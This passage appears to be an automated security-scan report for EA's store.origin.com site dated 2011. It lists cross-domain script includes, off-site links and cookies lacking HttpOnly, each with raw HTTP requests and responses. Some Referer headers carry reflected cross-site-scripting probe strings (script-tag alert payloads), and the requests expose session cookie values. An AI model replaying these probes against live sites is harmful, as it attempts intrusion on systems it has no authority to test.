<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/s_code_remote_v07.js"></script>
...[SNIP]...
<NOSCRIPT><IMG SRC="http://bp.specificclick.net?pixid=99017372" width=0 height=0 border=0></NOSCRIPT>
...[SNIP]...

2.3. http://store.origin.com/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /store?Action=DisplayPage&id=ProductFinderLogicPage&Locale=en_US&SiteID=ea&objectID=226783800&option=3 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; s_sq=%5B%5BB%5D%5D; s_cc=true

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=64735090744,0)
Date: Fri, 24 Jun 2011 14:35:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 1305


<!-- REQUEST ID: TIME=1308926150161:NODE=c2a5301:THREAD=1741 -->
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=be87e1f2&Env=BASE&Locale=en_US&SiteID=ea&ThemeID=718200&ceid=1
...[SNIP]...
a class="dr_buyNowButton" id="dr_addToCart" href="/store/ea/en_US/AddItemToRequisition/ThemeID.718200&productID=226783800" onclick="parent.loadIframeIcon(true); parent.closeIframe();" target="_parent"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/ea/eaSI/version/130/images/add_to_cart_en_US.gif" alt="add to cart" /></a>
...[SNIP]...

3. Cross-domain script include  previous  next
There are 7 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


3.1. http://store.origin.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.origin.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=64731893897,0)
Date: Fri, 24 Jun 2011 13:43:48 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app49
Content-Length: 60407


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308923028902:NODE=c2a4901:THREA
...[SNIP]...
<link href="http://store.origin.com" rel="canonical" />

<script src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/ui.core-tabs-common-min.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"></script>
...[SNIP]...
</script>


<script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ebisuna/cm/multimedia/js/simpleSearchSuggest.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/s_code_remote_v07.js"></script>
...[SNIP]...

3.2. http://store.origin.com/DRHM/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.origin.com
Path:   /DRHM/store

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /DRHM/store?Action=ContinueShopping&SiteID=ea&Locale=en_US&ThemeID=718200&Env=BASE HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store?Action=DisplayPage&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&id=ThreePgCheckoutShoppingCartPage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; s_cc=true; s_sq=eaeacom%2Ceaeacomna%2Ceastorena%3D%2526pid%253DNA%25253AUS%25253ASTORE%25253ANONE%25253ASTORE%25253ANONE%25253AEASTORENA%25253ANONE%25253ASHOPPINGCART%2526pidt%253D1%2526oid%253Dhttp%25253A//store.origin.com/DRHM/store%25253FAction%25253DContinueShopping%252526SiteID%25253Dea%252526Locale%25253Den_US%252526ThemeID%25253D718200%252526Env%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=116274717585,0)
Date: Fri, 24 Jun 2011 14:36:09 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 64866


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926169147:NODE=c2a5301:THREA
...[SNIP]...
<link href="http://store.origin.com" rel="canonical" />

<script src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/ui.core-tabs-common-min.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"></script>
...[SNIP]...
</script>


<script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ebisuna/cm/multimedia/js/simpleSearchSuggest.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/s_code_remote_v07.js"></script>
...[SNIP]...

3.3. http://store.origin.com/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store?Action=DisplayPage&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&id=ThreePgCheckoutShoppingCartPage HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; s_cc=true; s_sq=eaeacom%2Ceaeacomna%2Ceastorena%3D%2526pid%253DNA%25253AUS%25253ASTORE%25253ANONE%25253ASTORE%25253ANONE%25253AEASTORENA%25253ANONE%25253APRODUCTFINDERPAGE%2526pidt%253D1%2526oid%253Dhttp%25253A//store.origin.com/store/ea/en_US/AddItemToRequisition/ThemeID.718200%252526productID%25253D226783800%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=120569681122,0)
Date: Fri, 24 Jun 2011 14:36:05 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 26163


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926165255:NODE=c2a5301:THREA
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">


<script src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/ui.core-tabs-common-min.js"></script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"></script>
...[SNIP]...
<!--!/esi:include -->


<script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ebisuna/cm/multimedia/js/simpleSearchSuggest.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/s_code_remote_v07.js"></script>
...[SNIP]...

3.4. http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=146339517893,0)
Date: Fri, 24 Jun 2011 14:36:37 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 39966


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926197606:NODE=c2a5301:THREA
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">


<script src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/ui.core-tabs-common-min.js"></script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"></script>
...[SNIP]...
<!--!/esi:include -->


<script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ebisuna/cm/multimedia/js/simpleSearchSuggest.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/s_code_remote_v07.js"></script>
...[SNIP]...

3.5. http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayHomeTier3Page/StyleID.1364100/StyleVersion.247?a9c7d--%3E%3Cscript%3Ealert(1)%3C/script%3E84252b80866=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=137749517959,0)
Date: Fri, 24 Jun 2011 14:35:33 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 39947


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926133816:NODE=c2a5301:THREA
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">


<script src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/ui.core-tabs-common-min.js"></script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"></script>
...[SNIP]...
<!--!/esi:include -->


<script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ebisuna/cm/multimedia/js/simpleSearchSuggest.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/s_code_remote_v07.js"></script>
...[SNIP]...

3.6. http://store.origin.com/store/ea/en_US/pd/ThemeID.718200/productID.201797000  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store/ea/en_US/pd/ThemeID.718200/productID.201797000

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store/ea/en_US/pd/ThemeID.718200/productID.201797000 HTTP/1.1
Host: store.origin.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayHomeTier3Page/StyleID.1364100/StyleVersion.247?a9c7d--%3E%3Cscript%3Ealert(0x062)%3C/script%3E84252b80866=1
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=688587274.260.0000; ORA_WX_SESSION=10.2.11.49:260-0#0; JSESSIONID=D16C78DD65928965E35E73DFD8E01BF0; VISITOR_ID=971D4E8DFAED43671E5F8C17C533E4FF95647E15D19DC326

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=21784792732,0)
Date: Fri, 24 Jun 2011 14:25:39 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app41
Content-Length: 75477


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308925539845:NODE=c2a4101:THREA
...[SNIP]...
<link rel="canonical" href="http://store.origin.com/store/ea/en_US/pd/productID.201797000"/>

<script src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/ui.core-tabs-common-min.js"></script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"></script>
...[SNIP]...
</script>

<script src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
<script src="//drh.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/plugins/jquery.dltabs.min.js" type="text/javascript"></script>
...[SNIP]...
<!--!/esi:include -->


<script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ebisuna/cm/multimedia/js/simpleSearchSuggest.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/s_code_remote_v07.js"></script>
...[SNIP]...

3.7. http://store.origin.com/store/ea/home/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store/ea/home/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store/ea/home/ HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store?Action=DisplayPage&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&id=ThreePgCheckoutShoppingCartPage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_cc=true; s_sq=eaeacom%2Ceaeacomna%2Ceastorena%3D%2526pid%253DNA%25253AUS%25253ASTORE%25253ANONE%25253ASTORE%25253ANONE%25253AEASTORENA%25253ANONE%25253ASHOPPINGCART%2526pidt%253D1%2526oid%253Dhttp%25253A//store.origin.com/store/ea/home/%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=21785453355,0)
Date: Fri, 24 Jun 2011 14:36:24 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 64866


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926184850:NODE=c2a5301:THREA
...[SNIP]...
<link href="http://store.origin.com" rel="canonical" />

<script src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/ui.core-tabs-common-min.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"></script>
...[SNIP]...
</script>


<script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ebisuna/cm/multimedia/js/simpleSearchSuggest.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/s_code_remote_v07.js"></script>
...[SNIP]...

4. Cookie without HttpOnly flag set  previous  next
There are 3 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. http://store.origin.com/DRHM/Storefront/Site/ea/cm/multimedia/foresee/foresee-surveydef.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.origin.com
Path:   /DRHM/Storefront/Site/ea/cm/multimedia/foresee/foresee-surveydef.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DRHM/Storefront/Site/ea/cm/multimedia/foresee/foresee-surveydef.js HTTP/1.1
Host: store.origin.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 200 OK
Cache-Control: max-age=157788000
Expires: Thu, 23 Jun 2016 20:09:22 GMT
ETag: "124a-4cdd6bd8"
Content-Type: application/x-javascript
Last-Modified: Fri, 12 Nov 2010 16:31:20 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (M;max-age=7200+0;age=0;ecid=103388170674,0)
Content-Length: 4682
Date: Fri, 24 Jun 2011 14:09:22 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app45
Accept-Ranges: bytes
Set-Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=755696138.260.0000; path=/

FSR.surveydefs = [{
name: 'browse',
invite: {
when: 'onentry'
},
pop: {
when: 'later'
},
criteria: {
sp: 3.5,
lf: 3
},
inclu
...[SNIP]...

4.2. http://store.origin.com/DRHM/Storefront/Site/ea/images/promo/img_arrow.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.origin.com
Path:   /DRHM/Storefront/Site/ea/images/promo/img_arrow.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DRHM/Storefront/Site/ea/images/promo/img_arrow.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: store.origin.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=157788000
Expires: Thu, 02 Jun 2016 15:31:17 GMT
ETag: "184-4dbae12a"
Content-Type: image/jpeg
Last-Modified: Fri, 29 Apr 2011 16:02:50 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=3600+360;age=478;ecid=94799985348,0)
Content-Length: 388
Date: Fri, 03 Jun 2011 09:31:17 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc2app50
Accept-Ranges: bytes
Set-Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3875668490.772.0000; path=/

......JFIF.....d.d......Ducky.......M......Adobe.d................................................            .................................
.............................................................
...[SNIP]...

4.3. http://store.origin.com/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store?Action=DisplayPage&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&id=ThreePgCheckoutShoppingCartPage HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/DRHM/store?Action=ContinueShopping&SiteID=ea&Locale=en_US&ThemeID=718200&Env=BASE
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
